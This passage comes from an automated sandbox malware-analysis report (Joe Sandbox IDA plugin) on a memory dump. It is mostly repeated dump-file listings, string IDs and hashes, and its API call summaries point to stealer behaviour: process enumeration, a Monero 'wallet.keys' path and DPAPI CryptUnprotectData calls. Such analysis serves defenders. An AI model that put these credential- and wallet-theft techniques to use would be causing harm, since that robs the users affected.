                                • API String ID: 0-4011363835
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0L_$\u=$wW~$zw7
                                • API String ID: 0-3420334709
                                • Opcode ID: a0ff0887a2a3a3c00ccbd769daff7d04a978f0eaa94cb8540455a6d1de0d2f2c
                                • Instruction ID: ac303c75b6338351feca24916d532b56eb5f5d36d3211b373ff0782f4ab033a4
                                • Opcode Fuzzy Hash: a0ff0887a2a3a3c00ccbd769daff7d04a978f0eaa94cb8540455a6d1de0d2f2c
                                • Instruction Fuzzy Hash: 7BB2F6F360C2009FE3046E29EC8567AFBE6EFD4720F1A893DE6C487744EA3559058697
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00EE05B7), ref: 00ED86CA
                                • Process32First.KERNEL32(?,00000128), ref: 00ED86DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00ED86F3
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • CloseHandle.KERNEL32(?), ref: 00ED8761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 50e09dcdf99f9911258bf66980351c293388fcd6e84de577f4d2d4a532e42f37
                                • Instruction ID: 3cffa5143db88a72889eb7ee19f1da0149e138b355601ddf7f30c84e44249211
                                • Opcode Fuzzy Hash: 50e09dcdf99f9911258bf66980351c293388fcd6e84de577f4d2d4a532e42f37
                                • Instruction Fuzzy Hash: 70315971901258ABCB29DF51DC55FEEB7B8EF44700F1041AAB50AB2290DB706B86CFA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00EC5184,40000001,00000000,00000000,?,00EC5184), ref: 00ED8EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 7c1cfab1a4227254558c828736f56c21e5f594c6d645e725aecd44a6c75f6cbc
                                • Instruction ID: c34a518d7062d05fc6c5d07a17cd2c98fcc940a1db4679dea9fa724ad670a13d
                                • Opcode Fuzzy Hash: 7c1cfab1a4227254558c828736f56c21e5f594c6d645e725aecd44a6c75f6cbc
                                • Instruction Fuzzy Hash: 7611F874600208BFDB04CF64E984FA633AAEF89304F10A559F9299B340DB75E982DB60
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EE0E00,00000000,?), ref: 00ED79B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED79B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00EE0E00,00000000,?), ref: 00ED79C4
                                • wsprintfA.USER32 ref: 00ED79F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 113284afd500bdcb37418d92ba939f8a9e4e671030505ee2e18c53b44aa7fa9c
                                • Instruction ID: 9c6430193019e79092253c34bcea7f8e2c5b2638c4ba2fe9fb447bd41a856e93
                                • Opcode Fuzzy Hash: 113284afd500bdcb37418d92ba939f8a9e4e671030505ee2e18c53b44aa7fa9c
                                • Instruction Fuzzy Hash: 2C112AB2944218ABCB14DFD9ED45BBEB7F8FB4CB12F10411AF655A2284E2795940C7B0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00DADE90,00000000,?,00EE0E10,00000000,?,00000000,00000000), ref: 00ED7A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00DADE90,00000000,?,00EE0E10,00000000,?,00000000,00000000,?), ref: 00ED7A7D
                                • wsprintfA.USER32 ref: 00ED7AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 94a84f2ff79129fbe6f4a9e2b7ab1ee46f1ffadb76bb21149a17e70319e63a58
                                • Instruction ID: 8c4dc444db1fcb010948fca9d1e51fbc6a63f995d3acc0e45d4ef4f40a3b51f8
                                • Opcode Fuzzy Hash: 94a84f2ff79129fbe6f4a9e2b7ab1ee46f1ffadb76bb21149a17e70319e63a58
                                • Instruction Fuzzy Hash: A4113CB1E45218EBEB248B54DC49FA9B778FB44721F1042AAE91AA3280D7745A81CB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ?^{$N_;$\@w.
                                • API String ID: 0-1084285239
                                • Opcode ID: b263eb7f3c7ad23bff63918c02da13f1e27edaa09574f30533bb1c4ae2df81bd
                                • Instruction ID: 351e3cb79015f7456d798467f4562148507fbf5c9f853368778644d925135f5f
                                • Opcode Fuzzy Hash: b263eb7f3c7ad23bff63918c02da13f1e27edaa09574f30533bb1c4ae2df81bd
                                • Instruction Fuzzy Hash: 49B227F360C2049FE304AE2DEC8577AB7E9EF94320F1A493DEAC583744EA3558058697
                                APIs
                                • CoCreateInstance.COMBASE(00EDE118,00000000,00000001,00EDE108,00000000), ref: 00ED3758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00ED37B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: ee3dbc931606177f290133f550e284453de3f0735e773c3d1d988fc295c370e1
                                • Instruction ID: 3a5a858a3c8598385ae9368f0ee89dead2a36963bef1c2a124236c8cd4695b99
                                • Opcode Fuzzy Hash: ee3dbc931606177f290133f550e284453de3f0735e773c3d1d988fc295c370e1
                                • Instruction Fuzzy Hash: 76410974A00A189FDB24DB58CC84B9BB7B5FB48302F4051D9E608AB2D0D7B16EC6CF50
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EC9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EC9BA3
                                • LocalFree.KERNEL32(?), ref: 00EC9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: e9a0c118ff88c69c7321eebc7f3ba4561577ba823dc13d1efeb35b70d351957d
                                • Instruction ID: fd7b2df6c1467991c32d1210cec98d0763fc5491fafe22a3e18387370decad7a
                                • Opcode Fuzzy Hash: e9a0c118ff88c69c7321eebc7f3ba4561577ba823dc13d1efeb35b70d351957d
                                • Instruction Fuzzy Hash: A011FAB8A00209EFDB05DF94D985EAE77B5FF88300F104568E815A7340D775AE51CF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: v1<k$${>
                                • API String ID: 0-740598145
                                • Opcode ID: a12f50e3f1cb09e0b02a4356b9ce3babf66fd41b19f16aae10022056f59050b7
                                • Instruction ID: aa34cd71c13873db0128d7d7e6db4febe0ca32069b2906d997a7dc9d463d2f2a
                                • Opcode Fuzzy Hash: a12f50e3f1cb09e0b02a4356b9ce3babf66fd41b19f16aae10022056f59050b7
                                • Instruction Fuzzy Hash: DCB2F6F3A0C2009FE3046E2DEC8567ABBE9EF94720F16893DE6C4C7744EA3558158697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 9Bv>$=Bv>
                                • API String ID: 0-1139873718
                                • Opcode ID: a8ba4e19c610e68730816ed631e382bc35127926d75e916442e76aaf382add9e
                                • Instruction ID: 918045b5524c2d36a64f54247ac4a8f20d58d86efd99079769b323ff4ff12940
                                • Opcode Fuzzy Hash: a8ba4e19c610e68730816ed631e382bc35127926d75e916442e76aaf382add9e
                                • Instruction Fuzzy Hash: DBF106F3A0C2049FD3186E2DEC45A7ABBE6EFD4320F1A4A3DEAC4C3744E53558158696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: }<y
                                • API String ID: 0-761022994
                                • Opcode ID: a3a8e6e97b508bcb97c2cde21bca794d46f55c784868fb441b912604a50d58fb
                                • Instruction ID: 34e90ca453e57f8bf3cb2f715749094e14daaab03c405e906db1dcd1cf6583d7
                                • Opcode Fuzzy Hash: a3a8e6e97b508bcb97c2cde21bca794d46f55c784868fb441b912604a50d58fb
                                • Instruction Fuzzy Hash: 64B208F36082009FE304AE2DEC8567ABBE6EFD4720F1A893DE6C5C3744E63598458657
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: o?
                                • API String ID: 0-967569042
                                • Opcode ID: e8c7c303f56f2b18b19ce4d8a386ed002f0fd6d99f39074add4370839264898e
                                • Instruction ID: 73927f7c740db61194a60b80dcd29f19987d5a406f9783e807b3a2a068fe91c5
                                • Opcode Fuzzy Hash: e8c7c303f56f2b18b19ce4d8a386ed002f0fd6d99f39074add4370839264898e
                                • Instruction Fuzzy Hash: B502E4F390C6049FE3046E2DEC8167AFBE5EF94720F16492DEAC583344EA75A8118697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
